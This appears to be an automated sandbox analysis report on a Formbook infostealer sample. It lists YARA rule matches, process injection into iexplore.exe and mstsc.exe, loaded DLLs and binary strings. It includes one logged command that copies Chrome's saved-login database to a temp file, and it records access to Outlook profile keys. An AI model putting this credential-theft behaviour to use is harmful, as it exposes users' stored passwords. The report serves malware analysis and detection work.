          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe Binary or memory string: OriginalFilenameIzemuxaqiqawivuloD vs #U0426#U0438#U0442#U0430#U0442#U0430.exe
          Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          All three rules (Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook) matched in each of the following sources:
          Source: 1.2.iexplore.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.2.iexplore.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21ce007acc8.2.raw.unpack, type: UNPACKEDPE
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdfff5038.3.raw.unpack, type: UNPACKEDPE
          Source: 0.2.#U0426#U0438#U0442#U0430#U0442#U0430.exe.21cdffee3a0.4.raw.unpack, type: UNPACKEDPE
          Source: 00000006.00000002.4160236681.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: 00000001.00000002.1818201037.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: 00000001.00000002.1818164423.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: 00000006.00000002.4160052879.0000000004EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: 0000001D.00000002.4248139432.000000000F1B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: 00000006.00000002.4157361855.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: 0000000E.00000002.4231398925.000000000E520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: 00000000.00000002.1906133921.0000021CDFF61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Only Windows_Trojan_Formbook_1112e116 matched in each of the following sources:
          Source: Process Memory Space: iexplore.exe PID: 7612, type: MEMORYSTR
          Source: Process Memory Space: mstsc.exe PID: 7840, type: MEMORYSTR
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, RuntimeMethodInfoStubToCharArray.cs Suspicious URL: 'https://www.google.ru/'
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp, #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1903093132.0000021CCE3C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
          Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@322/289@33/14
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_003A3699 memset,memset,CreateThread,GetLastError,CloseHandle,LoadStringW,FormatMessageW,LoadStringW,MessageBoxW,LocalFree
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_00378051 GetModuleFileNameW,GetLastError,wcsrchr,GetCurrentProcessId,SysAllocString,SysAllocString,CoCreateInstance
          Source: C:\Windows\SysWOW64\mstsc.exe Code function: 6_2_004162D5 FindResourceExW,LoadResource
          Source: C:\Windows\SysWOW64\mstsc.exe File created: C:\Users\user\AppData\Roaming\260P27U-
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe Mutant created: NULL
          Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7532
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
          Source: C:\Windows\System32\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\7754c235-8f37-456f-8c5f-f58dfc87077a
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
          Source: C:\Windows\explorer.exe File read: C:\Users\user\Favorites\desktop.ini
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: mstsc.exe, 00000006.00000003.1897407843.000000000328E000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4157660306.000000000328E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000003.1892723066.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.1893018281.0000000002D35000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeReversingLabs: Detection: 55%
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeVirustotal: Detection: 59%
          Source: mstsc.exeString found in binary or memory: unknown-client-address
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeFile read: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe "C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exe"
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7532 -s 1080
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5640 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9478 /prefetch:2
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=2028,i,9608727623901059389,15898401197256129571,262144 /prefetch:8
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:3675436 /prefetch:2
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=820 --field-trial-handle=2108,i,1526023711057746171,13780567962873584071,262144 /prefetch:3
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=604 --field-trial-handle=1524,i,17359145505352969996,18071872945210523971,262144 /prefetch:3
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -newJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe "C:\Program Files\Internet Explorer\IEXPLORE.EXE" Jump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9474 /prefetch:2Jump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe" --from-ie-to-edge=3 --ie-frame-hwnd=204a6Jump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -newJump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:9478 /prefetch:2Jump to behavior
          Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3916 CREDAT:3675436 /prefetch:2Jump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptui.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ktmw32.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wininet.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: urlmon.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: iertutil.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: srvcli.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: netutils.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: uxtheme.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: windows.storage.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wldp.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: propsys.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: profapi.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: edputil.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: sspicli.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: wintypes.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: appresolver.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: bcp47langs.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: slc.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: userenv.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: sppc.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: vcruntime140.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: wininet.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: version.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: urlmon.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: msvcp140.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: iertutil.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: srvcli.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: netutils.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeFile written: C:\Users\user\AppData\Roaming\260P27U-\260logri.iniJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: #U0426#U0438#U0442#U0430#U0442#U0430.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: wntdll.pdb source: iexplore.exe, iexplore.exe, 00000001.00000003.1752125897.000000000331E000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.0000000003680000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818305285.000000000381E000.00000040.00001000.00020000.00000000.sdmp, iexplore.exe, 00000001.00000003.1754083552.00000000034CC000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000003.1820280873.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.0000000005150000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.1818354804.0000000004DF3000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4161102558.00000000052EE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Drawing.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Users\user\Desktop\#U0426#U0438#U0442#U0430#U0442#U0430.PDB source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8610000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: Microsoft.CSharp.pdb& source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Core.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: Microsoft.VisualBasic.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE861C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb4M source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER4970.tmp.dmp.4.dr
          Source: Binary string: System.Dynamic.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: mscorlib.ni.pdb source: WER4970.tmp.dmp.4.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE865F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: #U0426#U0438#U0442#U0430#U0442#U0430.exe, 00000000.00000002.1908934139.0000021CE8670000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mstsc.pdbGCTL source: iexplore.exe, 00000001.00000003.1817372482.0000000005440000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 00000001.00000002.1818921999.0000000005300000.00000040.10000000.00040000.00000000.sdmp, iexplore.exe, 00000001.00000003.1817182020.0000000005308000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.4156356840.0000000000300000.00000040.80000000.00040000.00000000.sdmp
